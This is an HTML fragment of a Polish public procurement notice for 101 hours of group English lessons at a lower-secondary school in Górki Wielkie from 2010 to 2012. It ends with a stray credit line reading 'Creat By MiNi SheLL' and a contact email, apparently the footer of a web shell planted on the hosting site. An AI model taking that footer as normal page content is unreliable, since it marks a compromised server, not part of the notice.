<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 101 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 35 godzin, w roku szkolnym 2011/2012 - 66 godziny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć grupowych z języka angielskiego dla uczniów Gimnazjum przy Zespole Szkół Publicznych w Górkach Wielkich (tj. 101 godzin dydaktycznych w tym w roku szkolnym 2010/2011 - 35 godzin, w roku szkolnym 2011/2012 - 66 godziny) poprzez:
-	rozwijanie zainteresowań uczniów,
-	pogłębianie wiedzy,
-	kształcenie i doskonalenie umiejętności posługiwania się językiem obcym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com